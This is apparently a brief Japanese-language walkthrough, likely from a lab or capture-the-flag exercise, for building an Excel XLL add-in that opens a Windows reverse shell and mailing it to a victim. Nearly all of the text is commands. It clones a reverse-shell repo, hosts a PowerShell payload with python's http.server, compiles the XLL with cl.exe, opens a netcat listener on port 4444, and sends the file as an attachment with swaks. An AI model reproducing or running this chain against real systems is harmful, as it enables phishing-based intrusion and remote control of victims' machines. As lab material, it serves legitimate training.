
xll Windows リバースシェル
xll Windowsリバースシェル
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1 を更新しますpython3 -m http.server 9999
notpadXLL.c をWindows攻撃者マシンに移動し、notpadXLL.c を適宜更新します。x64 Native Tools Command Prompt for VS 2022 を開きますnotepad.xll を生成しますcl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll をKaliマシンに移動しますswaks をダウンロードします curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
swaks を使用して、notepad.xll を添付したメールを送信します:./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
